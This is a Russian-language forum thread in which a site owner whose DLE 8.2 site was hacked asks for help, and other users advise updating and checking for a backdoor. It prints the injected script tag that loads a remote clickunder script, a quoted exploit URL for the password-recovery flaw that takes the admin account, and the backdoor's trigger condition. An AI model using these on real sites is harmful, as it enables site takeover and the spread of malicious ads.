Форум АНТИЧАТ - Нужна помощь ломают сайт

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Нужна помощь ломают сайт (https://forum.antichat.xyz/showthread.php?t=162314)

Нужна помощь ломают сайт

В общем проблемка такая. Недавно захожу на свой сайт и на своё удивление вижу что от куда то появилась рекламма кликандера. Попытался воити под админским аккаунтом, но так и не смог кто то сменил пароль, вобщем я воспользовался восстановлением пароля на e-mail зашёл в админку и нашёл в шаблоне такой код:

Код:

<script language='javascript' type='text/javascript' src='http://softxx.ru/m'></script>

посмотрел с какого IP последний раз заходили в админку 81.222.236.109
Информация об ip-адресе 81.222.236.109

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '81.222.236.0 - 81.222.236.255'

inetnum: 81.222.236.0 - 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: abuse@timeweb.ru
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

% Information related to '81.222.192.0/18AS20597'

route: 81.222.192.0/18
descr: ELTEL.net
origin: AS20597
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

Как я понял что кто то c VDS на TimeWebe ломает
Пробовал переименовать файл admin.php, но к сожалению не помогло сейчас снова ломанули
хочу сейчас права на запись main.tpl убрать незнаю поможет или нет :(
Подскажите что можно поделать сайт стоит на DLE

обновить версию дле

Попробуй DLE обновить и попроси кого-нибудь из прошареных знакомых сайт на уязвимости проверить, может найдете дырку, через которую зараза лезет.

смотри логи, мож найдеш чего интересного ;)

версия DLE 8.2
дело в том что у меня есть ещё пару сайтов на dle они на более старых версиях, но там всё нормально никто не ломает
кстати сейчас погуглил нашёл http://devilstar.habrahabr.ru/blog/76359/ видимо не только у меня такая проблемка

http://drtro.name/249-dle-8-2-nedostatochnye-filtraciya-v-praktike/
обнови свой дле

Точно такая проблема была сайт ломали по 3-4 раза на день! Поставил 8.3 всё нормально!

http://forum.antichat.ru/showpost.php?p=1683160&postcount=83

Цитата:

Найдена уязвимость в DLE 8.2(Только в этой версии)
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1

хм

средствами сервера поставь пароль на папку с админкой, с самим файлом .htaccess гемороится не советую, если есть директ админ - там это сделать очень просто.

В DLE 8.2 в одном из компонентов движка шелл.
Настоятельно рекомендую проверить файлик, лежащий по адресу - engine/ajax/updates.php
Ищем там такую шнягу - if($_GET['wert']=='')
Измени/обнови файл.
В следующий раз качай нуллы из достоверных источников.